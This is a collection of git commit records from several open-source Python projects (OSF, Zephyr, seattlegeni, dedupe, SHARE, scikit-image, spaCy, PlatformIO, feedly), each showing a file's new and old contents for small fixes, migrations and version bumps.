io,wearpants/osf.io,SSJohns/osf.io,erinspace/osf.io,amyshi188/osf.io,SSJohns/osf.io,alexschiller/osf.io,Johnetordoff/osf.io,alexschiller/osf.io,HalcyonChimera/osf.io,caneruguz/osf.io,mattclark/osf.io,sloria/osf.io,HalcyonChimera/osf.io,brianjgeiger/osf.io,cslzchen/osf.io,acshi/osf.io,CenterForOpenScience/osf.io,SSJohns/osf.io,rdhyee/osf.io,felliott/osf.io | scripts/s3/migrate_folder_language.py | scripts/s3/migrate_folder_language.py | import logging
import sys
import time
from modularodm import Q
from framework.mongo import database
from framework.transactions.context import TokuTransaction
from website.app import init_app
from website.addons.base.exceptions import InvalidAuthError, InvalidFolderError
from website.addons.s3.utils import get_bucket_location_or_error
from website.addons.s3.settings import BUCKET_LOCATIONS
from website.addons.s3.model import S3NodeSettings
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
def migrate(dry_run=False):
bucket_name_location_map = {}
sns_collection = database['s3nodesettings']
logger.info('Migrating all {} S3NodeSettings documents: {}'.format(
sns_collection.count(), [s['_id'] for s in sns_collection.find()]
))
for document in sns_collection.find():
sns_collection.find_and_modify(
{'_id': document['_id']},
{
'$set': {'folder_id': document['bucket']},
'$unset': {'bucket': ''}
}
)
allowance = 2
last_call = time.time()
for node_settings in S3NodeSettings.find(Q('folder_id', 'ne', None)):
if node_settings.folder_id in bucket_name_location_map:
# See if this bucket is cached
node_settings.folder_name = '{} ({})'.format(
node_settings.folder_id,
bucket_name_location_map[node_settings.folder_id]
)
else:
# Attempt to determine bucket location, default to just bucket name.
node_settings.folder_name = node_settings.folder_id
if allowance < 1:
try:
time.sleep(1 - (time.time() - last_call))
except (ValueError, IOError):
pass # ValueError/IOError indicates a negative sleep time
allowance = 2
allowance -= 1
last_call = time.time()
try:
bucket_location = get_bucket_location_or_error(
node_settings.external_account.oauth_key,
node_settings.external_account.oauth_secret,
node_settings.folder_id
)
except InvalidAuthError:
logger.info('Found S3NodeSettings {} with invalid credentials.'.format(node_settings._id))
except InvalidFolderError:
logger.info('Found S3NodeSettings {} with invalid bucket linked.'.format(node_settings._id))
except Exception as e:
logger.info('Found S3NodeSettings {} throwing unknown error. Likely configured improperly; with a bucket but no credentials'.format(node_settings._id))
logger.exception(e)
else:
try:
bucket_location = BUCKET_LOCATIONS[bucket_location]
except KeyError:
# Unlisted location, S3 may have added it recently.
# Default to the key. When hit, add mapping to settings
logger.info('Found unknown location key: {}'.format(bucket_location))
node_settings.folder_name = '{} ({})'.format(node_settings.folder_id, bucket_location)
bucket_name_location_map[node_settings.folder_id] = bucket_location
node_settings.save()
if dry_run:
raise RuntimeError('Dry run, transaction rolled back.')
def main():
dry_run = False
if '--dry' in sys.argv:
dry_run = True
if not dry_run:
script_utils.add_file_logger(logger, __file__)
init_app(set_backends=True, routes=False)
with TokuTransaction():
migrate(dry_run=dry_run)
if __name__ == "__main__":
main()
| import logging
import sys
from modularodm import Q
from framework.mongo import database
from framework.transactions.context import TokuTransaction
from website.app import init_app
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
def migrate(dry_run=False):
sns_collection = database['s3nodesettings']
logger.info('Migrating all {} S3NodeSettings documents: {}'.format(
sns_collection.count(), [s['_id'] for s in sns_collection.find()]
))
sns_collection.find_and_modify(
{},
{'$rename': {'bucket': 'folder_id'}
})
# TODO: update folder_name with bucket location
if dry_run:
raise RuntimeError('Dry run, transaction rolled back.')
def main():
dry_run = False
if '--dry' in sys.argv:
dry_run = True
if not dry_run:
script_utils.add_file_logger(logger, __file__)
init_app(set_backends=True, routes=False)
with TokuTransaction():
migrate(dry_run=dry_run)
if __name__ == "__main__":
main()
| apache-2.0 | Python |
934a8cb077c733542f01da2312c3084559c2271c | remove obsolete KBUILD_VERBOSE | galak/zephyr,punitvara/zephyr,explora26/zephyr,zephyriot/zephyr,zephyrproject-rtos/zephyr,kraj/zephyr,Vudentz/zephyr,mbolivar/zephyr,aceofall/zephyr-iotos,explora26/zephyr,ldts/zephyr,GiulianoFranchetto/zephyr,punitvara/zephyr,mbolivar/zephyr,GiulianoFranchetto/zephyr,zephyriot/zephyr,finikorg/zephyr,Vudentz/zephyr,zephyrproject-rtos/zephyr,ldts/zephyr,zephyrproject-rtos/zephyr,kraj/zephyr,kraj/zephyr,nashif/zephyr,GiulianoFranchetto/zephyr,kraj/zephyr,Vudentz/zephyr,explora26/zephyr,aceofall/zephyr-iotos,aceofall/zephyr-iotos,zephyrproject-rtos/zephyr,galak/zephyr,nashif/zephyr,kraj/zephyr,GiulianoFranchetto/zephyr,ldts/zephyr,finikorg/zephyr,galak/zephyr,galak/zephyr,zephyriot/zephyr,Vudentz/zephyr,finikorg/zephyr,punitvara/zephyr,zephyriot/zephyr,nashif/zephyr,zephyriot/zephyr,ldts/zephyr,finikorg/zephyr,aceofall/zephyr-iotos,aceofall/zephyr-iotos,mbolivar/zephyr,finikorg/zephyr,ldts/zephyr,punitvara/zephyr,nashif/zephyr,zephyrproject-rtos/zephyr,galak/zephyr,mbolivar/zephyr,Vudentz/zephyr,explora26/zephyr,GiulianoFranchetto/zephyr,nashif/zephyr,mbolivar/zephyr,Vudentz/zephyr,punitvara/zephyr,explora26/zephyr | scripts/support/zephyr_flash_debug.py | scripts/support/zephyr_flash_debug.py | #! /usr/bin/env python3
# Copyright (c) 2017 Linaro Limited.
#
# SPDX-License-Identifier: Apache-2.0
"""Zephyr flash/debug script
This script is a transparent replacement for legacy Zephyr flash and
debug scripts which have now been removed. It will be refactored over
time as the rest of the build system is taught to use it.
"""
from os import path
import sys
from runner.core import ZephyrBinaryRunner, get_env_bool_or
# TODO: Stop using environment variables.
#
# Migrate the build system so we can use an argparse.ArgumentParser and
# per-flasher subparsers, so invoking the script becomes something like:
#
# python zephyr_flash_debug.py openocd --openocd-bin=/openocd/path ...
#
# For now, maintain compatibility.
def run(shell_script_full, command, debug):
shell_script = path.basename(shell_script_full)
try:
runner = ZephyrBinaryRunner.create_for_shell_script(shell_script,
command,
debug)
except ValueError:
print('Unrecognized shell script {}'.format(shell_script_full),
file=sys.stderr)
raise
runner.run(command)
if __name__ == '__main__':
commands = {'flash', 'debug', 'debugserver'}
debug = True
try:
debug = get_env_bool_or('VERBOSE', False)
if len(sys.argv) != 3 or sys.argv[1] not in commands:
raise ValueError('usage: {} <{}> path-to-script'.format(
sys.argv[0], '|'.join(commands)))
run(sys.argv[2], sys.argv[1], debug)
except Exception as e:
if debug:
raise
else:
print('Error: {}'.format(e), file=sys.stderr)
print('Re-run with VERBOSE=1 for a stack trace.',
file=sys.stderr)
sys.exit(1)
| #! /usr/bin/env python3
# Copyright (c) 2017 Linaro Limited.
#
# SPDX-License-Identifier: Apache-2.0
"""Zephyr flash/debug script
This script is a transparent replacement for legacy Zephyr flash and
debug scripts which have now been removed. It will be refactored over
time as the rest of the build system is taught to use it.
"""
from os import path
import sys
from runner.core import ZephyrBinaryRunner, get_env_bool_or
# TODO: Stop using environment variables.
#
# Migrate the build system so we can use an argparse.ArgumentParser and
# per-flasher subparsers, so invoking the script becomes something like:
#
# python zephyr_flash_debug.py openocd --openocd-bin=/openocd/path ...
#
# For now, maintain compatibility.
def run(shell_script_full, command, debug):
shell_script = path.basename(shell_script_full)
try:
runner = ZephyrBinaryRunner.create_for_shell_script(shell_script,
command,
debug)
except ValueError:
print('Unrecognized shell script {}'.format(shell_script_full),
file=sys.stderr)
raise
runner.run(command)
if __name__ == '__main__':
commands = {'flash', 'debug', 'debugserver'}
debug = True
try:
debug = get_env_bool_or('KBUILD_VERBOSE', False)
if len(sys.argv) != 3 or sys.argv[1] not in commands:
raise ValueError('usage: {} <{}> path-to-script'.format(
sys.argv[0], '|'.join(commands)))
run(sys.argv[2], sys.argv[1], debug)
except Exception as e:
if debug:
raise
else:
print('Error: {}'.format(e), file=sys.stderr)
print('Re-run with KBUILD_VERBOSE=1 for a stack trace.',
file=sys.stderr)
sys.exit(1)
| apache-2.0 | Python |
952841ab7df91533b03fe590fd8f4d88a35f1441 | Fix a copy-and-paste bug in the seattlegeni statistics module just added. | sburnett/seattle,sburnett/seattle,sburnett/seattle,sburnett/seattle,sburnett/seattle,sburnett/seattle | seattlegeni/common/util/statistics.py | seattlegeni/common/util/statistics.py | """
Provides information about the data in the database. This is for generating
reports, not for any core functionality of seattlegeni.
Some of the functions in the module are very database intensive. They could
be done more efficiently, but where possible this module tries to use the
maindb api so that summarized information matches how seattlegeni actually
sees things.
"""
from seattlegeni.common.api import maindb
from seattlegeni.website.control.models import GeniUser
from seattlegeni.common.util import log
def get_vessel_acquisition_counts_by_user():
# Set the log level high enough so that we don't produce a bunch of logging
# output due to the logging decorators.
initial_log_level = log.loglevel
log.set_log_level(log.LOG_LEVEL_INFO)
vessel_acquisition_dict = {}
for user in GeniUser.objects.all():
acquired_vessels = maindb.get_acquired_vessels(user)
if len(acquired_vessels) > 0:
vessel_acquisition_dict[user.username] = len(acquired_vessels)
# Restore the original log level.
log.set_log_level(initial_log_level)
return vessel_acquisition_dict
def get_donation_counts_by_user():
# Set the log level high enough so that we don't produce a bunch of logging
# output due to the logging decorators.
initial_log_level = log.loglevel
log.set_log_level(log.LOG_LEVEL_INFO)
donation_dict = {}
for user in GeniUser.objects.all():
active_donation_count = len(maindb.get_donations_by_user(user))
inactive_donation_count = len(maindb.get_donations_by_user(user, include_inactive_and_broken=True)) - active_donation_count
if active_donation_count > 0 or inactive_donation_count > 0:
donation_dict[user.username] = (active_donation_count, inactive_donation_count)
# Restore the original log level.
log.set_log_level(initial_log_level)
return donation_dict
def get_available_vessel_counts_by_port():
# Set the log level high enough so that we don't produce a bunch of logging
# output due to the logging decorators.
initial_log_level = log.loglevel
log.set_log_level(log.LOG_LEVEL_INFO)
available_vessels_dict = {}
for port in maindb.ALLOWED_USER_PORTS:
available_vessels_dict[port] = {}
available_vessels_dict[port]["all"] = maindb._get_queryset_of_all_available_vessels_for_a_port_include_nat_nodes(port).count()
available_vessels_dict[port]["no_nat"] = maindb._get_queryset_of_all_available_vessels_for_a_port_exclude_nat_nodes(port).count()
available_vessels_dict[port]["only_nat"] = maindb._get_queryset_of_all_available_vessels_for_a_port_only_nat_nodes(port).count()
# Restore the original log level.
log.set_log_level(initial_log_level)
return available_vessels_dict
| """
Provides information about the data in the database. This is for generating
reports, not for any core functionality of seattlegeni.
Some of the functions in the module are very database intensive. They could
be done more efficiently, but where possible this module tries to use the
maindb api so that summarized information matches how seattlegeni actually
sees things.
"""
from seattlegeni.common.api import maindb
from seattlegeni.website.control.models import GeniUser
from seattlegeni.common.util import log
def get_vessel_acquisition_counts_by_user():
# Set the log level high enough so that we don't produce a bunch of logging
# output due to the logging decorators.
initial_log_level = log.loglevel
log.set_log_level(log.LOG_LEVEL_INFO)
vessel_acquisition_dict = {}
for user in GeniUser.objects.all():
acquired_vessels = maindb.get_acquired_vessels(user)
if len(acquired_vessels) > 0:
vessel_acquisition_dict[user.username] = len(acquired_vessels)
# Restore the original log level.
log.set_log_level(initial_log_level)
return vessel_acquisition_dict
def get_donation_counts_by_user():
# Set the log level high enough so that we don't produce a bunch of logging
# output due to the logging decorators.
initial_log_level = log.loglevel
log.set_log_level(log.LOG_LEVEL_INFO)
donation_dict = {}
for user in GeniUser.objects.all():
active_donation_count = len(maindb.get_donations_by_user(user))
inactive_donation_count = len(maindb.get_donations_by_user(user, include_inactive_and_broken=True)) - active_donation_count
if active_donation_count > 0 or inactive_donation_count > 0:
donation_dict[user.username] = (active_donation_count, inactive_donation_count)
# Restore the original log level.
log.set_log_level(initial_log_level)
return donation_dict
def get_available_vessel_counts_by_port():
# Set the log level high enough so that we don't produce a bunch of logging
# output due to the logging decorators.
initial_log_level = log.loglevel
log.set_log_level(log.LOG_LEVEL_INFO)
available_vessels_dict = {}
for port in maindb.ALLOWED_USER_PORTS:
available_vessels_dict[port] = {}
available_vessels_dict[port]["all"] = maindb._get_queryset_of_all_available_vessels_for_a_port_include_nat_nodes(port).count()
available_vessels_dict[port]["no_nat"] = maindb._get_queryset_of_all_available_vessels_for_a_port_include_nat_nodes(port).count()
available_vessels_dict[port]["only_nat"] = maindb._get_queryset_of_all_available_vessels_for_a_port_only_nat_nodes(port).count()
# Restore the original log level.
log.set_log_level(initial_log_level)
return available_vessels_dict
| mit | Python |
091d2f91402e2ce52a2a07b88c74ae722cf1b19c | Add the first element of data_list at the end again, as the probablity of it beign selected was zero | pombredanne/dedupe,tfmorris/dedupe,neozhangthe1/dedupe,tfmorris/dedupe,dedupeio/dedupe,davidkunio/dedupe,pombredanne/dedupe,01-/dedupe,dedupeio/dedupe-examples,datamade/dedupe,davidkunio/dedupe,dedupeio/dedupe,datamade/dedupe,neozhangthe1/dedupe,01-/dedupe,nmiranda/dedupe,nmiranda/dedupe | dedupe/convenience.py | dedupe/convenience.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Convenience functions for in memory deduplication
"""
import collections
import dedupe.core
def dataSample(data, sample_size, constrained_matching=False):
'''Randomly sample pairs of records from a data dictionary'''
data_list = data.values()
if constrained_matching:
data_list_A = []
data_list_B = []
for record in data_list:
if record['dataset'] == 0:
data_list_A.append(record)
else:
data_list_B.append(record)
data_list_A.append(data_list_A[0])
data_list_B.append(data_list_B[0])
n_records = min(len(data_list_A), len(data_list_B))
random_pairs = dedupe.core.randomPairs(n_records, sample_size)
return tuple((data_list_A[int(k1)], data_list_B[int(k2)]) for k1, k2 in random_pairs)
else:
random_pairs = dedupe.core.randomPairs(len(data_list), sample_size)
return tuple((data_list[int(k1)], data_list[int(k2)]) for k1, k2 in random_pairs)
def blockData(data_d, blocker, constrained_matching=False):
blocks = dedupe.core.OrderedDict({})
record_blocks = dedupe.core.OrderedDict({})
key_blocks = dedupe.core.OrderedDict({})
blocker.tfIdfBlocks(data_d.iteritems(), constrained_matching)
for (record_id, record) in data_d.iteritems():
for key in blocker((record_id, record)):
blocks.setdefault(key, {}).update({record_id : record})
blocked_records = tuple(block for block in blocks.values())
return blocked_records
| #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Convenience functions for in memory deduplication
"""
import collections
import dedupe.core
def dataSample(data, sample_size, constrained_matching=False):
'''Randomly sample pairs of records from a data dictionary'''
data_list = data.values()
if constrained_matching:
data_list_A = []
data_list_B = []
for record in data_list:
if record['dataset'] == 0:
data_list_A.append(record)
else:
data_list_B.append(record)
n_records = min(len(data_list_A), len(data_list_B))
random_pairs = dedupe.core.randomPairs(n_records, sample_size)
return tuple((data_list_A[int(k1)], data_list_B[int(k2)]) for k1, k2 in random_pairs)
else:
random_pairs = dedupe.core.randomPairs(len(data_list), sample_size)
return tuple((data_list[int(k1)], data_list[int(k2)]) for k1, k2 in random_pairs)
def blockData(data_d, blocker, constrained_matching=False):
blocks = dedupe.core.OrderedDict({})
record_blocks = dedupe.core.OrderedDict({})
key_blocks = dedupe.core.OrderedDict({})
blocker.tfIdfBlocks(data_d.iteritems(), constrained_matching)
for (record_id, record) in data_d.iteritems():
for key in blocker((record_id, record)):
blocks.setdefault(key, {}).update({record_id : record})
blocked_records = tuple(block for block in blocks.values())
return blocked_records
| mit | Python |
d2ba774814546f821ba967c95f0ecff8b7f4a596 | Correct release2 command | zamattiac/SHARE,zamattiac/SHARE,CenterForOpenScience/SHARE,CenterForOpenScience/SHARE,CenterForOpenScience/SHARE,laurenbarker/SHARE,aaxelb/SHARE,aaxelb/SHARE,laurenbarker/SHARE,aaxelb/SHARE,zamattiac/SHARE,laurenbarker/SHARE | share/management/commands/release2.py | share/management/commands/release2.py | from django.core.management.base import BaseCommand
from django.db import connection
from django.db import transaction
class Command(BaseCommand):
def handle(self, *args, **options):
with transaction.atomic():
with connection.cursor() as c:
c.execute('''
DO $$
DECLARE
tname TEXT;
keep TEXT [] = ARRAY ['share_rawdata', 'share_shareuser', 'share_providerregistration'];
BEGIN
FOR tname IN (SELECT table_name
FROM information_schema.tables
WHERE table_schema = 'public' AND NOT (table_name = ANY (keep))
AND table_name LIKE 'share_%'
AND NOT table_name LIKE 'share_shareuser%'
)
LOOP
RAISE NOTICE 'DROP TABLE % CASCADE', tname;
EXECUTE 'DROP TABLE ' || tname || ' CASCADE';
END LOOP;
END;
$$;
''')
c.execute("DELETE FROM django_migrations WHERE app = 'share';")
| from django.core.management.base import BaseCommand
from django.db import connection
from django.db import transaction
class Command(BaseCommand):
def handle(self, *args, **options):
with transaction.atomic():
with connection.cursor() as c:
c.execute('''
DO $$
DECLARE
tname TEXT;
keep TEXT [] = ARRAY [];
BEGIN FOR tname IN (SELECT table_name
FROM information_schem.tables
WHERE table_schema = 'public' AND NOT (table_name = ANY (keep))
AND table_name LIKE 'share_%'
AND NOT table_name LIKE 'share_shareuser%'
LOOP
RAISE NOTICE 'DROP TABLE % CASCADE', tname;
EXECUTE 'DROP TABLE ' || tname || ' CASCADE';
END LOOP;
END;
$$
''')
c.execute("DELETE FROM django_migrations WHERE app = 'share';")
| apache-2.0 | Python |
dd45f15ced95ed43b889f464b4116bb8f4124d99 | Use explicit keyword for dtype | dpshelio/scikit-image,WarrenWeckesser/scikits-image,vighneshbirodkar/scikit-image,SamHames/scikit-image,ClinicalGraphics/scikit-image,ajaybhat/scikit-image,almarklein/scikit-image,Britefury/scikit-image,Midafi/scikit-image,Hiyorimi/scikit-image,chriscrosscutler/scikit-image,oew1v07/scikit-image,chintak/scikit-image,rjeli/scikit-image,chriscrosscutler/scikit-image,robintw/scikit-image,almarklein/scikit-image,bsipocz/scikit-image,keflavich/scikit-image,GaZ3ll3/scikit-image,Midafi/scikit-image,almarklein/scikit-image,paalge/scikit-image,keflavich/scikit-image,juliusbierk/scikit-image,jwiggins/scikit-image,ClinicalGraphics/scikit-image,chintak/scikit-image,rjeli/scikit-image,Hiyorimi/scikit-image,michaelaye/scikit-image,michaelpacer/scikit-image,warmspringwinds/scikit-image,michaelaye/scikit-image,robintw/scikit-image,youprofit/scikit-image,newville/scikit-image,paalge/scikit-image,jwiggins/scikit-image,dpshelio/scikit-image,emon10005/scikit-image,GaZ3ll3/scikit-image,paalge/scikit-image,vighneshbirodkar/scikit-image,blink1073/scikit-image,michaelpacer/scikit-image,vighneshbirodkar/scikit-image,newville/scikit-image,bennlich/scikit-image,ofgulban/scikit-image,warmspringwinds/scikit-image,oew1v07/scikit-image,juliusbierk/scikit-image,emon10005/scikit-image,Britefury/scikit-image,SamHames/scikit-image,almarklein/scikit-image,ajaybhat/scikit-image,SamHames/scikit-image,blink1073/scikit-image,youprofit/scikit-image,bsipocz/scikit-image,bennlich/scikit-image,chintak/scikit-image,rjeli/scikit-image,ofgulban/scikit-image,chintak/scikit-image,WarrenWeckesser/scikits-image,pratapvardhan/scikit-image,pratapvardhan/scikit-image,SamHames/scikit-image,ofgulban/scikit-image | skimage/segmentation/_clear_border.py | skimage/segmentation/_clear_border.py | import numpy as np
from scipy.ndimage import label
def clear_border(image, buffer_size=0, bgval=0):
"""Clear objects connected to image border.
The changes will be applied to the input image.
Parameters
----------
image : (N, M) array
Binary image.
buffer_size : int, optional
Define additional buffer around image border.
bgval : float or int, optional
Value for cleared objects.
Returns
-------
image : (N, M) array
Cleared binary image.
Examples
--------
>>> import numpy as np
>>> from skimage.segmentation import clear_border
>>> image = np.array([[0, 0, 0, 0, 0, 0, 0, 1, 0],
... [0, 0, 0, 0, 1, 0, 0, 0, 0],
... [1, 0, 0, 1, 0, 1, 0, 0, 0],
... [0, 0, 1, 1, 1, 1, 1, 0, 0],
... [0, 1, 1, 1, 1, 1, 1, 1, 0],
... [0, 0, 0, 0, 0, 0, 0, 0, 0]])
>>> clear_border(image)
array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]])
"""
rows, cols = image.shape
if buffer_size >= rows or buffer_size >= cols:
raise ValueError("buffer size may not be greater than image size")
# create borders with buffer_size
borders = np.zeros_like(image, dtype=np.bool_)
ext = buffer_size + 1
borders[:ext] = True
borders[- ext:] = True
borders[:, :ext] = True
borders[:, - ext:] = True
labels, number = label(image)
# determine all objects that are connected to borders
borders_indices = np.unique(labels[borders])
indices = np.arange(number + 1)
# mask all label indices that are connected to borders
label_mask = np.in1d(indices, borders_indices)
# create mask for pixels to clear
mask = label_mask[labels.ravel()].reshape(labels.shape)
# clear border pixels
image[mask] = bgval
return image
| import numpy as np
from scipy.ndimage import label
def clear_border(image, buffer_size=0, bgval=0):
"""Clear objects connected to image border.
The changes will be applied to the input image.
Parameters
----------
image : (N, M) array
Binary image.
buffer_size : int, optional
Define additional buffer around image border.
bgval : float or int, optional
Value for cleared objects.
Returns
-------
image : (N, M) array
Cleared binary image.
Examples
--------
>>> import numpy as np
>>> from skimage.segmentation import clear_border
>>> image = np.array([[0, 0, 0, 0, 0, 0, 0, 1, 0],
... [0, 0, 0, 0, 1, 0, 0, 0, 0],
... [1, 0, 0, 1, 0, 1, 0, 0, 0],
... [0, 0, 1, 1, 1, 1, 1, 0, 0],
... [0, 1, 1, 1, 1, 1, 1, 1, 0],
... [0, 0, 0, 0, 0, 0, 0, 0, 0]])
>>> clear_border(image)
array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]])
"""
rows, cols = image.shape
if buffer_size >= rows or buffer_size >= cols:
raise ValueError("buffer size may not be greater than image size")
# create borders with buffer_size
borders = np.zeros_like(image, np.bool_)
ext = buffer_size + 1
borders[:ext] = True
borders[- ext:] = True
borders[:, :ext] = True
borders[:, - ext:] = True
labels, number = label(image)
# determine all objects that are connected to borders
borders_indices = np.unique(labels[borders])
indices = np.arange(number + 1)
# mask all label indices that are connected to borders
label_mask = np.in1d(indices, borders_indices)
# create mask for pixels to clear
mask = label_mask[labels.ravel()].reshape(labels.shape)
# clear border pixels
image[mask] = bgval
return image
| bsd-3-clause | Python |
0adadcb3f04e2ecb98b5ca5de1afba2ba7208d23 | Fix beam parse model test | aikramer2/spaCy,spacy-io/spaCy,recognai/spaCy,recognai/spaCy,explosion/spaCy,recognai/spaCy,explosion/spaCy,spacy-io/spaCy,recognai/spaCy,explosion/spaCy,spacy-io/spaCy,spacy-io/spaCy,aikramer2/spaCy,explosion/spaCy,spacy-io/spaCy,aikramer2/spaCy,spacy-io/spaCy,honnibal/spaCy,explosion/spaCy,honnibal/spaCy,aikramer2/spaCy,recognai/spaCy,honnibal/spaCy,aikramer2/spaCy,recognai/spaCy,honnibal/spaCy,explosion/spaCy,aikramer2/spaCy | spacy/tests/parser/test_beam_parse.py | spacy/tests/parser/test_beam_parse.py | # coding: utf8
from __future__ import unicode_literals
import pytest
@pytest.mark.models('en')
def test_beam_parse(EN):
doc = EN(u'Australia is a country', disable=['ner'])
ents = EN.entity(doc, beam_width=2)
print(ents)
| import spacy
import pytest
@pytest.mark.models
def test_beam_parse():
nlp = spacy.load('en_core_web_sm')
doc = nlp(u'Australia is a country', disable=['ner'])
ents = nlp.entity(doc, beam_width=2)
print(ents)
| mit | Python |
54d2a1c109de23aa8ab0556bc07cfd4dc29f7f25 | fix return in check function | sdpython/code_beatrix,sdpython/code_beatrix,sdpython/code_beatrix,sdpython/code_beatrix | src/code_beatrix/scratchs/__init__.py | src/code_beatrix/scratchs/__init__.py | """
@file
@brief shortcuts for scratch
"""
#from .example_echiquier import check as check1
from .example_echiquier import check_echiquier
from .example_tri import check_tri
from .example_pyramide import check_pyramide
from .example_chute import check_chute
def check():
"""
run checking functions
"""
check_echiquier()
check_tri()
check_pyramide()
check_chute()
return True
| """
@file
@brief shortcuts for scratch
"""
#from .example_echiquier import check as check1
from .example_echiquier import check_echiquier
from .example_tri import check_tri
from .example_pyramide import check_pyramide
from .example_chute import check_chute
def check():
"""
run checking functions
"""
check_echiquier()
check_tri()
check_pyramide()
check_chute()
| mit | Python |
6e8f60a27a5a1dc05162ad33fe3490677469b956 | Bump version to 5.2.4b1 | platformio/platformio-core,platformio/platformio,platformio/platformio-core | platformio/__init__.py | platformio/__init__.py | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
VERSION = (5, 2, "4b1")
__version__ = ".".join([str(s) for s in VERSION])
__title__ = "platformio"
__description__ = (
"A professional collaborative platform for embedded development. "
"Cross-platform IDE and Unified Debugger. "
"Static Code Analyzer and Remote Unit Testing. "
"Multi-platform and Multi-architecture Build System. "
"Firmware File Explorer and Memory Inspection. "
"IoT, Arduino, CMSIS, ESP-IDF, FreeRTOS, libOpenCM3, mbedOS, Pulp OS, SPL, "
"STM32Cube, Zephyr RTOS, ARM, AVR, Espressif (ESP8266/ESP32), FPGA, "
"MCS-51 (8051), MSP430, Nordic (nRF51/nRF52), NXP i.MX RT, PIC32, RISC-V, "
"STMicroelectronics (STM8/STM32), Teensy"
)
__url__ = "https://platformio.org"
__author__ = "PlatformIO Labs"
__email__ = "contact@piolabs.com"
__license__ = "Apache Software License"
__copyright__ = "Copyright 2014-present PlatformIO Labs"
__accounts_api__ = "https://api.accounts.platformio.org"
__registry_api__ = [
"https://api.registry.platformio.org",
"https://api.registry.ns1.platformio.org",
]
__pioremote_endpoint__ = "ssl:host=remote.platformio.org:port=4413"
__default_requests_timeout__ = (10, None) # (connect, read)
__core_packages__ = {
"contrib-piohome": "~3.4.0",
"contrib-pysite": "~2.%d%d.0" % (sys.version_info.major, sys.version_info.minor),
"tool-unity": "~1.20500.0",
"tool-scons": "~4.40300.0",
"tool-cppcheck": "~1.260.0",
"tool-clangtidy": "~1.120001.0",
"tool-pvs-studio": "~7.14.0",
}
__check_internet_hosts__ = [
"185.199.110.153", # Github.com
"88.198.170.159", # platformio.org
"github.com",
"platformio.org",
]
| # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
VERSION = (5, 2, "4a4")
__version__ = ".".join([str(s) for s in VERSION])
__title__ = "platformio"
__description__ = (
"A professional collaborative platform for embedded development. "
"Cross-platform IDE and Unified Debugger. "
"Static Code Analyzer and Remote Unit Testing. "
"Multi-platform and Multi-architecture Build System. "
"Firmware File Explorer and Memory Inspection. "
"IoT, Arduino, CMSIS, ESP-IDF, FreeRTOS, libOpenCM3, mbedOS, Pulp OS, SPL, "
"STM32Cube, Zephyr RTOS, ARM, AVR, Espressif (ESP8266/ESP32), FPGA, "
"MCS-51 (8051), MSP430, Nordic (nRF51/nRF52), NXP i.MX RT, PIC32, RISC-V, "
"STMicroelectronics (STM8/STM32), Teensy"
)
__url__ = "https://platformio.org"
__author__ = "PlatformIO Labs"
__email__ = "contact@piolabs.com"
__license__ = "Apache Software License"
__copyright__ = "Copyright 2014-present PlatformIO Labs"
__accounts_api__ = "https://api.accounts.platformio.org"
__registry_api__ = [
"https://api.registry.platformio.org",
"https://api.registry.ns1.platformio.org",
]
__pioremote_endpoint__ = "ssl:host=remote.platformio.org:port=4413"
__default_requests_timeout__ = (10, None) # (connect, read)
__core_packages__ = {
"contrib-piohome": "~3.4.0",
"contrib-pysite": "~2.%d%d.0" % (sys.version_info.major, sys.version_info.minor),
"tool-unity": "~1.20500.0",
"tool-scons": "~4.40300.0",
"tool-cppcheck": "~1.260.0",
"tool-clangtidy": "~1.120001.0",
"tool-pvs-studio": "~7.14.0",
}
__check_internet_hosts__ = [
"185.199.110.153", # Github.com
"88.198.170.159", # platformio.org
"github.com",
"platformio.org",
]
| apache-2.0 | Python |
ea576dc8a8082172d8b2c7a9edf1e00d384b5f14 | move import so it installs | SergioChan/Stream-Framework,Architizer/Feedly,Anislav/Stream-Framework,smuser90/Stream-Framework,nikolay-saskovets/Feedly,nikolay-saskovets/Feedly,izhan/Stream-Framework,turbolabtech/Stream-Framework,smuser90/Stream-Framework,turbolabtech/Stream-Framework,Anislav/Stream-Framework,nikolay-saskovets/Feedly,turbolabtech/Stream-Framework,SergioChan/Stream-Framework,Architizer/Feedly,izhan/Stream-Framework,smuser90/Stream-Framework,SergioChan/Stream-Framework,izhan/Stream-Framework,nikolay-saskovets/Feedly,Anislav/Stream-Framework,Architizer/Feedly,izhan/Stream-Framework,smuser90/Stream-Framework,SergioChan/Stream-Framework,Anislav/Stream-Framework,turbolabtech/Stream-Framework | feedly/connection.py | feedly/connection.py | #cache this at the process module level
connection_cache = {}
def get_redis_connection():
from nydus.db import create_cluster
from django.conf import settings
config = settings.NYDUS_CONFIG['CONNECTIONS']['redis']
key = unicode(config)
cluster = connection_cache.get(key)
if not cluster:
cluster = create_cluster(config)
connection_cache[key] = cluster
return cluster
| from nydus.db import create_cluster
#cache this at the process module level
connection_cache = {}
def get_redis_connection():
from django.conf import settings
